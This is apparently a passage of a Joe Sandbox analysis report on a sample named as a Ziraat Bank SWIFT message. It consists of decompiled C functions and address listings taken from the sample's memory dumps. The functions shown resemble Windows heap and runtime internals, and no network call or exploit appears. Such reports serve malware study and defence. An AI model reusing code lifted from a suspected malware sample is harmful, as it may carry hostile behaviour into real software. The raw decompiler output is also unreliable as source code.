                                                                    • Associated: 00000001.00000002.376129817.000000000198B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000001.00000002.376158887.000000000198F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_1870000_Ziraat Bankasi Swift Mesaji20221121.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: a12b831f6a3e25e15692eec79a6d9f6fb77989e1e4d77a77c4df028726c3d072
                                                                    • Instruction ID: 297b09de0f57df05abfa58b6fab77bf778cee1c61d613412f28d1c125d20f905
                                                                    • Opcode Fuzzy Hash: a12b831f6a3e25e15692eec79a6d9f6fb77989e1e4d77a77c4df028726c3d072
                                                                    • Instruction Fuzzy Hash: 1C41E671A443189FEB32DF18CC90F6AB7A9EB45B14F05009DE949DB281D774DE80CB92
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 85%
                                                                    			E018C4BAD(intOrPtr __ecx, short __edx, signed char _a4, signed short _a8) {
                                                                    				signed int _v8;
                                                                    				short _v20;
                                                                    				intOrPtr _v24;
                                                                    				intOrPtr _v28;
                                                                    				intOrPtr _v32;
                                                                    				char _v36;
                                                                    				char _v156;
                                                                    				short _v158;
                                                                    				intOrPtr _v160;
                                                                    				char _v164;
                                                                    				intOrPtr _v168;
                                                                    				void* __ebx;
                                                                    				void* __edi;
                                                                    				void* __esi;
                                                                    				signed int _t45;
                                                                    				intOrPtr _t74;
                                                                    				signed char _t77;
                                                                    				intOrPtr _t84;
                                                                    				char* _t85;
                                                                    				void* _t86;
                                                                    				intOrPtr _t87;
                                                                    				signed short _t88;
                                                                    				signed int _t89;
                                                                    
                                                                    				_t83 = __edx;
                                                                    				_v8 =  *0x198d360 ^ _t89;
                                                                    				_t45 = _a8 & 0x0000ffff;
                                                                    				_v158 = __edx;
                                                                    				_v168 = __ecx;
                                                                    				if(_t45 == 0) {
                                                                    					L22:
                                                                    					_t86 = 6;
                                                                    					L12:
                                                                    					E0189CC50(_t86);
                                                                    					L11:
                                                                    					return E018DB640(_t86, _t77, _v8 ^ _t89, _t83, _t84, _t86);
                                                                    				}
                                                                    				_t77 = _a4;
                                                                    				if((_t77 & 0x00000001) != 0) {
                                                                    					goto L22;
                                                                    				}
                                                                    				_t8 = _t77 + 0x34; // 0xdce0ba00
                                                                    				if(_t45 !=  *_t8) {
                                                                    					goto L22;
                                                                    				}
                                                                    				_t9 = _t77 + 0x24; // 0x1988504
                                                                    				E018B2280(_t9, _t9);
                                                                    				_t87 = 0x78;
                                                                    				 *(_t77 + 0x2c) =  *( *[fs:0x18] + 0x24);
                                                                    				E018DFA60( &_v156, 0, _t87);
                                                                    				_t13 = _t77 + 0x30; // 0x3db8
                                                                    				_t85 =  &_v156;
                                                                    				_v36 =  *_t13;
                                                                    				_v28 = _v168;
                                                                    				_v32 = 0;
                                                                    				_v24 = 0;
                                                                    				_v20 = _v158;
                                                                    				_v160 = 0;
                                                                    				while(1) {
                                                                    					_push( &_v164);
                                                                    					_push(_t87);
                                                                    					_push(_t85);
                                                                    					_push(0x18);
                                                                    					_push( &_v36);
                                                                    					_push(0x1e);
                                                                    					_t88 = E018DB0B0();
                                                                    					if(_t88 != 0xc0000023) {
                                                                    						break;
                                                                    					}
                                                                    					if(_t85 !=  &_v156) {
                                                                    						L018B77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t85);
                                                                    					}
                                                                    					_t84 = L018B4620(0,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v164);
                                                                    					_v168 = _v164;
                                                                    					if(_t84 == 0) {
                                                                    						_t88 = 0xc0000017;
                                                                    						goto L19;
                                                                    					} else {
                                                                    						_t74 = _v160 + 1;
                                                                    						_v160 = _t74;
                                                                    						if(_t74 >= 0x10) {
                                                                    							L19:
                                                                    							_t86 = E0189CCC0(_t88);
                                                                    							if(_t86 != 0) {
                                                                    								L8:
                                                                    								 *(_t77 + 0x2c) =  *(_t77 + 0x2c) & 0x00000000;
                                                                    								_t30 = _t77 + 0x24; // 0x1988504
                                                                    								E018AFFB0(_t77, _t84, _t30);
                                                                    								if(_t84 != 0 && _t84 !=  &_v156) {
                                                                    									L018B77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t84);
                                                                    								}
                                                                    								if(_t86 != 0) {
                                                                    									goto L12;
                                                                    								} else {
                                                                    									goto L11;
                                                                    								}
                                                                    							}
                                                                    							L6:
                                                                    							 *(_t77 + 0x36) =  *(_t77 + 0x36) | 0x00004000;
                                                                    							if(_v164 != 0) {
                                                                    								_t83 = _t84;
                                                                    								E018C4F49(_t77, _t84);
                                                                    							}
                                                                    							goto L8;
                                                                    						}
                                                                    						_t87 = _v168;
                                                                    						continue;
                                                                    					}
                                                                    				}
                                                                    				if(_t88 != 0) {
                                                                    					goto L19;
                                                                    				}
                                                                    				goto L6;
                                                                    			}


























                                                                    0x018c4bad
                                                                    0x018c4bbf
                                                                    0x018c4bc2
                                                                    0x018c4bc6
                                                                    0x018c4bcd
                                                                    0x018c4bd9
                                                                    0x019067fe
                                                                    0x01906800
                                                                    0x018c4ccc
                                                                    0x018c4ccd
                                                                    0x018c4cb7
                                                                    0x018c4cc9
                                                                    0x018c4cc9
                                                                    0x018c4bdf
                                                                    0x018c4be5
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x018c4beb
                                                                    0x018c4bef
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x018c4bf5
                                                                    0x018c4bf9
                                                                    0x018c4c06
                                                                    0x018c4c0b
                                                                    0x018c4c17
                                                                    0x018c4c1c
                                                                    0x018c4c1f
                                                                    0x018c4c25
                                                                    0x018c4c33
                                                                    0x018c4c3d
                                                                    0x018c4c40
                                                                    0x018c4c43
                                                                    0x018c4c47
                                                                    0x018c4c4d
                                                                    0x018c4c53
                                                                    0x018c4c54
                                                                    0x018c4c55
                                                                    0x018c4c56
                                                                    0x018c4c5b
                                                                    0x018c4c5c
                                                                    0x018c4c63
                                                                    0x018c4c6b
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x01906776
                                                                    0x01906784
                                                                    0x01906784
                                                                    0x0190679f
                                                                    0x019067a7
                                                                    0x019067af
                                                                    0x019067ce
                                                                    0x00000000
                                                                    0x019067b1
                                                                    0x019067b7
                                                                    0x019067b8
                                                                    0x019067c1
                                                                    0x019067d3
                                                                    0x019067d9
                                                                    0x019067dd
                                                                    0x018c4c94
                                                                    0x018c4c94
                                                                    0x018c4c98
                                                                    0x018c4c9c
                                                                    0x018c4ca3
                                                                    0x019067f4
                                                                    0x019067f4
                                                                    0x018c4cb5
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x018c4cb5
                                                                    0x018c4c79
                                                                    0x018c4c7e
                                                                    0x018c4c89
                                                                    0x018c4c8b
                                                                    0x018c4c8f
                                                                    0x018c4c8f
                                                                    0x00000000
                                                                    0x018c4c89
                                                                    0x019067c3
                                                                    0x00000000
                                                                    0x019067c3
                                                                    0x019067af
                                                                    0x018c4c73
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000

                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.373517823.0000000001870000.00000040.00000800.00020000.00000000.sdmp, Offset: 01870000, based on PE: true
                                                                    • Associated: 00000001.00000002.376129817.000000000198B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000001.00000002.376158887.000000000198F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_1870000_Ziraat Bankasi Swift Mesaji20221121.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: cb89c898a0d1d39b9bf0d68a56fd94dc1c45afcb31e838dede181384aa20c6d4
                                                                    • Instruction ID: a988899b5c67386f34490b675339b0605145f7913d6159dd26c14cf21cc1c88d
                                                                    • Opcode Fuzzy Hash: cb89c898a0d1d39b9bf0d68a56fd94dc1c45afcb31e838dede181384aa20c6d4
                                                                    • Instruction Fuzzy Hash: 4E418235A402299FDB21DF6CC940BEE77B8AF55B10F0100A9E908EB291DB74DF84CB95
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 94%
                                                                    			E018A8A0A(intOrPtr* __ecx, signed int __edx) {
                                                                    				signed int _v8;
                                                                    				char _v524;
                                                                    				signed int _v528;
                                                                    				void* _v532;
                                                                    				char _v536;
                                                                    				char _v540;
                                                                    				char _v544;
                                                                    				intOrPtr* _v548;
                                                                    				void* __ebx;
                                                                    				void* __edi;
                                                                    				void* __esi;
                                                                    				signed int _t44;
                                                                    				void* _t46;
                                                                    				void* _t48;
                                                                    				signed int _t53;
                                                                    				signed int _t55;
                                                                    				intOrPtr* _t62;
                                                                    				void* _t63;
                                                                    				unsigned int _t75;
                                                                    				signed int _t79;
                                                                    				unsigned int _t81;
                                                                    				unsigned int _t83;
                                                                    				signed int _t84;
                                                                    				void* _t87;
                                                                    
                                                                    				_t76 = __edx;
                                                                    				_v8 =  *0x198d360 ^ _t84;
                                                                    				_v536 = 0x200;
                                                                    				_t79 = 0;
                                                                    				_v548 = __edx;
                                                                    				_v544 = 0;
                                                                    				_t62 = __ecx;
                                                                    				_v540 = 0;
                                                                    				_v532 =  &_v524;
                                                                    				if(__edx == 0 || __ecx == 0) {
                                                                    					L6:
                                                                    					return E018DB640(_t79, _t62, _v8 ^ _t84, _t76, _t79, _t81);
                                                                    				} else {
                                                                    					_v528 = 0;
                                                                    					E018AE9C0(1, __ecx, 0, 0,  &_v528);
                                                                    					_t44 = _v528;
                                                                    					_t81 =  *(_t44 + 0x48) & 0x0000ffff;
                                                                    					_v528 =  *(_t44 + 0x4a) & 0x0000ffff;
                                                                    					_t46 = 0xa;
                                                                    					_t87 = _t81 - _t46;
                                                                    					if(_t87 > 0 || _t87 == 0) {
                                                                    						 *_v548 = 0x1871180;
                                                                    						L5:
                                                                    						_t79 = 1;
                                                                    						goto L6;
                                                                    					} else {
                                                                    						_t48 = E018C1DB5(_t62,  &_v532,  &_v536);
                                                                    						_t76 = _v528;
                                                                    						if(_t48 == 0) {
                                                                    							L9:
                                                                    							E018D3C2A(_t81, _t76,  &_v544);
                                                                    							 *_v548 = _v544;
                                                                    							goto L5;
                                                                    						}
                                                                    						_t62 = _v532;
                                                                    						if(_t62 != 0) {
                                                                    							_t83 = (_t81 << 0x10) + (_t76 & 0x0000ffff);
                                                                    							_t53 =  *_t62;
                                                                    							_v528 = _t53;
                                                                    							if(_t53 != 0) {
                                                                    								_t63 = _t62 + 4;
                                                                    								_t55 = _v528;
                                                                    								do {
                                                                    									if( *((intOrPtr*)(_t63 + 0x10)) == 1) {
                                                                    										if(E018A8999(_t63,  &_v540) == 0) {
                                                                    											_t55 = _v528;
                                                                    										} else {
                                                                    											_t75 = (( *(_v540 + 0x14) & 0x0000ffff) << 0x10) + ( *(_v540 + 0x16) & 0x0000ffff);
                                                                    											_t55 = _v528;
                                                                    											if(_t75 >= _t83) {
                                                                    												_t83 = _t75;
                                                                    											}
                                                                    										}
                                                                    									}
                                                                    									_t63 = _t63 + 0x14;
                                                                    									_t55 = _t55 - 1;
                                                                    									_v528 = _t55;
                                                                    								} while (_t55 != 0);
                                                                    								_t62 = _v532;
                                                                    							}
                                                                    							if(_t62 !=  &_v524) {
                                                                    								L018B77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t79, _t62);
                                                                    							}
                                                                    							_t76 = _t83 & 0x0000ffff;
                                                                    							_t81 = _t83 >> 0x10;
                                                                    						}
                                                                    						goto L9;
                                                                    					}
                                                                    				}
                                                                    			}



























                                                                    0x018a8a0a
                                                                    0x018a8a1c
                                                                    0x018a8a23
                                                                    0x018a8a2e
                                                                    0x018a8a30
                                                                    0x018a8a36
                                                                    0x018a8a3c
                                                                    0x018a8a3e
                                                                    0x018a8a4a
                                                                    0x018a8a52
                                                                    0x018a8a9c
                                                                    0x018a8aae
                                                                    0x018a8a58
                                                                    0x018a8a5e
                                                                    0x018a8a6a
                                                                    0x018a8a6f
                                                                    0x018a8a75
                                                                    0x018a8a7d
                                                                    0x018a8a85
                                                                    0x018a8a86
                                                                    0x018a8a89
                                                                    0x018a8a93
                                                                    0x018a8a99
                                                                    0x018a8a9b
                                                                    0x00000000
                                                                    0x018a8aaf
                                                                    0x018a8abe
                                                                    0x018a8ac3
                                                                    0x018a8acb
                                                                    0x018a8ad7
                                                                    0x018a8ae0
                                                                    0x018a8af1
                                                                    0x00000000
                                                                    0x018a8af1
                                                                    0x018a8acd
                                                                    0x018a8ad5
                                                                    0x018a8afb
                                                                    0x018a8afd
                                                                    0x018a8aff
                                                                    0x018a8b07
                                                                    0x018a8b22
                                                                    0x018a8b24
                                                                    0x018a8b2a
                                                                    0x018a8b2e
                                                                    0x018a8b3f
                                                                    0x018a8b78
                                                                    0x018a8b41
                                                                    0x018a8b52
                                                                    0x018a8b54
                                                                    0x018a8b5c
                                                                    0x018a8b74
                                                                    0x018a8b74
                                                                    0x018a8b5c
                                                                    0x018a8b3f
                                                                    0x018a8b5e
                                                                    0x018a8b61
                                                                    0x018a8b64
                                                                    0x018a8b64
                                                                    0x018a8b6c
                                                                    0x018a8b6c
                                                                    0x018a8b11
                                                                    0x018f9cd5
                                                                    0x018f9cd5
                                                                    0x018a8b17
                                                                    0x018a8b1a
                                                                    0x018a8b1a
                                                                    0x00000000
                                                                    0x018a8ad5
                                                                    0x018a8a89

                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.373517823.0000000001870000.00000040.00000800.00020000.00000000.sdmp, Offset: 01870000, based on PE: true
                                                                    • Associated: 00000001.00000002.376129817.000000000198B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000001.00000002.376158887.000000000198F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_1870000_Ziraat Bankasi Swift Mesaji20221121.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 276046b5fd13910e50ee456057617be8f9dfc5154d94375e06d4c20e27024627
                                                                    • Instruction ID: 30b5c5df0f81cd7bcd745df9f7b07b8a86e96ea2b6e6f5bdd78b2ad8c3f9dbcd
                                                                    • Opcode Fuzzy Hash: 276046b5fd13910e50ee456057617be8f9dfc5154d94375e06d4c20e27024627
                                                                    • Instruction Fuzzy Hash: B2418DB0A0022C9BEB24DF19C898BA9B7F4EB95301F5041EAD909D7242E7709F81CF61
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 76%
                                                                    			E0195FDE2(signed int* __ecx, signed int __edx, signed int _a4) {
                                                                    				char _v8;
                                                                    				signed int _v12;
                                                                    				signed int _t29;
                                                                    				char* _t32;
                                                                    				char* _t43;
                                                                    				signed int _t80;
                                                                    				signed int* _t84;
                                                                    
                                                                    				_push(__ecx);
                                                                    				_push(__ecx);
                                                                    				_t56 = __edx;
                                                                    				_t84 = __ecx;
                                                                    				_t80 = E0195FD4E(__ecx, __edx);
                                                                    				_v12 = _t80;
                                                                    				if(_t80 != 0) {
                                                                    					_t29 =  *__ecx & _t80;
                                                                    					_t74 = (_t80 - _t29 >> 4 << __ecx[1]) + _t29;
                                                                    					if(__edx <= (_t80 - _t29 >> 4 << __ecx[1]) + _t29) {
                                                                    						E01960A13(__ecx, _t80, 0, _a4);
                                                                    						_t80 = 1;
                                                                    						if(E018B7D50() == 0) {
                                                                    							_t32 = 0x7ffe0380;
                                                                    						} else {
                                                                    							_t32 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
                                                                    						}
                                                                    						if( *_t32 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000001) != 0) {
                                                                    							_push(3);
                                                                    							L21:
                                                                    							E01951608( *((intOrPtr*)(_t84 + 0x3c)), _t56);
                                                                    						}
                                                                    						goto L22;
                                                                    					}
                                                                    					if(( *(_t80 + 0xc) & 0x0000000c) != 8) {
                                                                    						_t80 = E01962B28(__ecx[0xc], _t74, __edx, _a4,  &_v8);
                                                                    						if(_t80 != 0) {
                                                                    							_t66 =  *((intOrPtr*)(_t84 + 0x2c));
                                                                    							_t77 = _v8;
                                                                    							if(_v8 <=  *((intOrPtr*)( *((intOrPtr*)(_t84 + 0x2c)) + 0x28)) - 8) {
                                                                    								E0195C8F7(_t66, _t77, 0);
                                                                    							}
                                                                    						}
                                                                    					} else {
                                                                    						_t80 = E0195DBD2(__ecx[0xb], _t74, __edx, _a4);
                                                                    					}
                                                                    					if(E018B7D50() == 0) {
                                                                    						_t43 = 0x7ffe0380;
                                                                    					} else {
                                                                    						_t43 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
                                                                    					}
                                                                    					if( *_t43 == 0 || ( *( *[fs:0x30] + 0x240) & 0x00000001) == 0 || _t80 == 0) {
                                                                    						goto L22;
                                                                    					} else {
                                                                    						_push((0 | ( *(_v12 + 0xc) & 0x0000000c) != 0x00000008) + 2);
                                                                    						goto L21;
                                                                    					}
                                                                    				} else {
                                                                    					_push(__ecx);
                                                                    					_push(_t80);
                                                                    					E0195A80D(__ecx[0xf], 9, __edx, _t80);
                                                                    					L22:
                                                                    					return _t80;
                                                                    				}
                                                                    			}










                                                                    0x0195fde7
                                                                    0x0195fde8
                                                                    0x0195fdec
                                                                    0x0195fdee
                                                                    0x0195fdf5
                                                                    0x0195fdf7
                                                                    0x0195fdfc
                                                                    0x0195fe19
                                                                    0x0195fe22
                                                                    0x0195fe26
                                                                    0x0195fec6
                                                                    0x0195fecd
                                                                    0x0195fed5
                                                                    0x0195fee7
                                                                    0x0195fed7
                                                                    0x0195fee0
                                                                    0x0195fee0
                                                                    0x0195feef
                                                                    0x0195ff00
                                                                    0x0195ff02
                                                                    0x0195ff07
                                                                    0x0195ff07
                                                                    0x00000000
                                                                    0x0195feef
                                                                    0x0195fe33
                                                                    0x0195fe55
                                                                    0x0195fe59
                                                                    0x0195fe5b
                                                                    0x0195fe5e
                                                                    0x0195fe69
                                                                    0x0195fe6d
                                                                    0x0195fe6d
                                                                    0x0195fe69
                                                                    0x0195fe35
                                                                    0x0195fe41
                                                                    0x0195fe41
                                                                    0x0195fe79
                                                                    0x0195fe8b
                                                                    0x0195fe7b
                                                                    0x0195fe84
                                                                    0x0195fe84
                                                                    0x0195fe93
                                                                    0x00000000
                                                                    0x0195fea8
                                                                    0x0195feba
                                                                    0x00000000
                                                                    0x0195feba
                                                                    0x0195fdfe
                                                                    0x0195fe01
                                                                    0x0195fe02
                                                                    0x0195fe08
                                                                    0x0195ff0c
                                                                    0x0195ff14
                                                                    0x0195ff14

                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.373517823.0000000001870000.00000040.00000800.00020000.00000000.sdmp, Offset: 01870000, based on PE: true
                                                                    • Associated: 00000001.00000002.376129817.000000000198B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000001.00000002.376158887.000000000198F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_1870000_Ziraat Bankasi Swift Mesaji20221121.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 3ef4319804cf21a17d71333ba11752c881d61f5af92be3a911c0d40f229f6d46
                                                                    • Instruction ID: 4cfcfbf496c97dbdbdb5e3e6182e921e1e419c681d2324908f826ecf1e8adbad
                                                                    • Opcode Fuzzy Hash: 3ef4319804cf21a17d71333ba11752c881d61f5af92be3a911c0d40f229f6d46
                                                                    • Instruction Fuzzy Hash: 443114322006416FD362DB6CC848F6ABBEEEBC5761F184458ED4EAB742DA74EC41C760
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 70%
                                                                    			E0195EA55(intOrPtr* __ecx, char __edx, signed int _a4) {
                                                                    				signed int _v8;
                                                                    				char _v12;
                                                                    				intOrPtr _v15;
                                                                    				char _v16;
                                                                    				intOrPtr _v19;
                                                                    				void* _v28;
                                                                    				intOrPtr _v36;
                                                                    				void* __ebx;
                                                                    				void* __edi;
                                                                    				signed char _t26;
                                                                    				signed int _t27;
                                                                    				char* _t40;
                                                                    				unsigned int* _t50;
                                                                    				intOrPtr* _t58;
                                                                    				unsigned int _t59;
                                                                    				char _t75;
                                                                    				signed int _t86;
                                                                    				intOrPtr _t88;
                                                                    				intOrPtr* _t91;
                                                                    
                                                                    				_t75 = __edx;
                                                                    				_t91 = __ecx;
                                                                    				_v12 = __edx;
                                                                    				_t50 = __ecx + 0x30;
                                                                    				_t86 = _a4 & 0x00000001;
                                                                    				if(_t86 == 0) {
                                                                    					E018B2280(_t26, _t50);
                                                                    					_t75 = _v16;
                                                                    				}
                                                                    				_t58 = _t91;
                                                                    				_t27 = E0195E815(_t58, _t75);
                                                                    				_v8 = _t27;
                                                                    				if(_t27 != 0) {
                                                                    					E0189F900(_t91 + 0x34, _t27);
                                                                    					if(_t86 == 0) {
                                                                    						E018AFFB0(_t50, _t86, _t50);
                                                                    					}
                                                                    					_push( *((intOrPtr*)(_t91 + 4)));
                                                                    					_push( *_t91);
                                                                    					_t59 =  *(_v8 + 0x10);
                                                                    					_t53 = 1 << (_t59 >> 0x00000002 & 0x0000003f);
                                                                    					_push(0x8000);
                                                                    					_t11 = _t53 - 1; // 0x0
                                                                    					_t12 = _t53 - 1; // 0x0
                                                                    					_v16 = ((_t59 >> 0x00000001 & 1) + (_t59 >> 0xc) << 0xc) - 1 + (1 << (_t59 >> 0x00000002 & 0x0000003f)) - (_t11 + ((_t59 >> 0x00000001 & 1) + (_t59 >> 0x0000000c) << 0x0000000c) & _t12);
                                                                    					E0195AFDE( &_v12,  &_v16);
                                                                    					asm("lock xadd [eax], ecx");
                                                                    					asm("lock xadd [eax], ecx");
                                                                    					E0195BCD2(_v8,  *_t91,  *((intOrPtr*)(_t91 + 4)));
                                                                    					_t55 = _v36;
                                                                    					_t88 = _v36;
                                                                    					if(E018B7D50() == 0) {
                                                                    						_t40 = 0x7ffe0388;
                                                                    					} else {
                                                                    						_t55 = _v19;
                                                                    						_t40 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
                                                                    					}
                                                                    					if( *_t40 != 0) {
                                                                    						E0194FE3F(_t55, _t91, _v15, _t55);
                                                                    					}
                                                                    				} else {
                                                                    					if(_t86 == 0) {
                                                                    						E018AFFB0(_t50, _t86, _t50);
                                                                    						_t75 = _v16;
                                                                    					}
                                                                    					_push(_t58);
                                                                    					_t88 = 0;
                                                                    					_push(0);
                                                                    					E0195A80D(_t91, 8, _t75, 0);
                                                                    				}
                                                                    				return _t88;
                                                                    			}






















                                                                    0x0195ea55
                                                                    0x0195ea66
                                                                    0x0195ea68
                                                                    0x0195ea6c
                                                                    0x0195ea6f
                                                                    0x0195ea72
                                                                    0x0195ea75
                                                                    0x0195ea7a
                                                                    0x0195ea7a
                                                                    0x0195ea7e
                                                                    0x0195ea80
                                                                    0x0195ea85
                                                                    0x0195ea8b
                                                                    0x0195eab5
                                                                    0x0195eabc
                                                                    0x0195eabf
                                                                    0x0195eabf
                                                                    0x0195eaca
                                                                    0x0195eace
                                                                    0x0195ead0
                                                                    0x0195eae4
                                                                    0x0195eaeb
                                                                    0x0195eaf0
                                                                    0x0195eaf5
                                                                    0x0195eb09
                                                                    0x0195eb0d
                                                                    0x0195eb1d
                                                                    0x0195eb2d
                                                                    0x0195eb38
                                                                    0x0195eb3d
                                                                    0x0195eb41
                                                                    0x0195eb4a
                                                                    0x0195eb60
                                                                    0x0195eb4c
                                                                    0x0195eb52
                                                                    0x0195eb59
                                                                    0x0195eb59
                                                                    0x0195eb68
                                                                    0x0195eb71
                                                                    0x0195eb71
                                                                    0x0195ea8d
                                                                    0x0195ea8f
                                                                    0x0195ea92
                                                                    0x0195ea97
                                                                    0x0195ea97
                                                                    0x0195ea9b
                                                                    0x0195ea9c
                                                                    0x0195ea9e
                                                                    0x0195eaa6
                                                                    0x0195eaa6
                                                                    0x0195eb7e

                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.373517823.0000000001870000.00000040.00000800.00020000.00000000.sdmp, Offset: 01870000, based on PE: true
                                                                    • Associated: 00000001.00000002.376129817.000000000198B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000001.00000002.376158887.000000000198F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_1870000_Ziraat Bankasi Swift Mesaji20221121.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: f5f831e91637f778ab1786019c0fe1c1c634a5059deceac50859eb6d9a86e6aa
                                                                    • Instruction ID: dfab03478aac76d4dba342b180ec0489ba5fd0eade1716d0605459626da66268
                                                                    • Opcode Fuzzy Hash: f5f831e91637f778ab1786019c0fe1c1c634a5059deceac50859eb6d9a86e6aa
                                                                    • Instruction Fuzzy Hash: FF31C3326047069BC719DF28C880A5BF7AAFFC0310F04492DF95A97741DE31E905C7A5
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 69%
                                                                    			E019169A6(signed short* __ecx, void* __eflags) {
                                                                    				signed int _v8;
                                                                    				signed int _v16;
                                                                    				intOrPtr _v20;
                                                                    				signed int _v24;
                                                                    				signed short _v28;
                                                                    				signed int _v32;
                                                                    				intOrPtr _v36;
                                                                    				signed int _v40;
                                                                    				char* _v44;
                                                                    				signed int _v48;
                                                                    				intOrPtr _v52;
                                                                    				signed int _v56;
                                                                    				char _v60;
                                                                    				signed int _v64;
                                                                    				char _v68;
                                                                    				char _v72;
                                                                    				signed short* _v76;
                                                                    				signed int _v80;
                                                                    				char _v84;
                                                                    				void* __ebx;
                                                                    				void* __edi;
                                                                    				void* __esi;
                                                                    				void* _t68;
                                                                    				intOrPtr _t73;
                                                                    				signed short* _t74;
                                                                    				void* _t77;
                                                                    				void* _t78;
                                                                    				signed int _t79;
                                                                    				signed int _t80;
                                                                    
                                                                    				_v8 =  *0x198d360 ^ _t80;
                                                                    				_t75 = 0x100;
                                                                    				_v64 = _v64 & 0x00000000;
                                                                    				_v76 = __ecx;
                                                                    				_t79 = 0;
                                                                    				_t68 = 0;
                                                                    				_v72 = 1;
                                                                    				_v68 =  *((intOrPtr*)( *[fs:0x18] + 0x20));
                                                                    				_t77 = 0;
                                                                    				if(L018A6C59(__ecx[2], 0x100, __eflags) != 0) {
                                                                    					_t79 =  *((intOrPtr*)( *[fs:0x30] + 0x1e8));
                                                                    					if(_t79 != 0 && E01916BA3() != 0) {
                                                                    						_push(0);
                                                                    						_push(0);
                                                                    						_push(0);
                                                                    						_push(0x1f0003);
                                                                    						_push( &_v64);
                                                                    						if(E018D9980() >= 0) {
                                                                    							E018B2280(_t56, 0x1988778);
                                                                    							_t77 = 1;
                                                                    							_t68 = 1;
                                                                    							if( *0x1988774 == 0) {
                                                                    								asm("cdq");
                                                                    								 *(_t79 + 0xf70) = _v64;
                                                                    								 *(_t79 + 0xf74) = 0x100;
                                                                    								_t75 = 0;
                                                                    								_t73 = 4;
                                                                    								_v60 =  &_v68;
                                                                    								_v52 = _t73;
                                                                    								_v36 = _t73;
                                                                    								_t74 = _v76;
                                                                    								_v44 =  &_v72;
                                                                    								 *0x1988774 = 1;
                                                                    								_v56 = 0;
                                                                    								_v28 = _t74[2];
                                                                    								_v48 = 0;
                                                                    								_v20 = ( *_t74 & 0x0000ffff) + 2;
                                                                    								_v40 = 0;
                                                                    								_v32 = 0;
                                                                    								_v24 = 0;
                                                                    								_v16 = 0;
                                                                    								if(E0189B6F0(0x187c338, 0x187c288, 3,  &_v60) == 0) {
                                                                    									_v80 = _v80 | 0xffffffff;
                                                                    									_push( &_v84);
                                                                    									_push(0);
                                                                    									_push(_v64);
                                                                    									_v84 = 0xfa0a1f00;
                                                                    									E018D9520();
                                                                    								}
                                                                    							}
                                                                    						}
                                                                    					}
                                                                    				}
                                                                    				if(_v64 != 0) {
                                                                    					_push(_v64);
                                                                    					E018D95D0();
                                                                    					 *(_t79 + 0xf70) =  *(_t79 + 0xf70) & 0x00000000;
                                                                    					 *(_t79 + 0xf74) =  *(_t79 + 0xf74) & 0x00000000;
                                                                    				}
                                                                    				if(_t77 != 0) {
                                                                    					E018AFFB0(_t68, _t77, 0x1988778);
                                                                    				}
                                                                    				_pop(_t78);
                                                                    				return E018DB640(_t68, _t68, _v8 ^ _t80, _t75, _t78, _t79);
                                                                    			}
































                                                                    0x019169b5
                                                                    0x019169be
                                                                    0x019169c3
                                                                    0x019169c9
                                                                    0x019169cc
                                                                    0x019169d1
                                                                    0x019169d3
                                                                    0x019169de
                                                                    0x019169e1
                                                                    0x019169ea
                                                                    0x019169f6
                                                                    0x019169fe
                                                                    0x01916a13
                                                                    0x01916a14
                                                                    0x01916a15
                                                                    0x01916a16
                                                                    0x01916a1e
                                                                    0x01916a26
                                                                    0x01916a31
                                                                    0x01916a36
                                                                    0x01916a37
                                                                    0x01916a40
                                                                    0x01916a49
                                                                    0x01916a4a
                                                                    0x01916a53
                                                                    0x01916a59
                                                                    0x01916a5d
                                                                    0x01916a5e
                                                                    0x01916a64
                                                                    0x01916a67
                                                                    0x01916a6a
                                                                    0x01916a6d
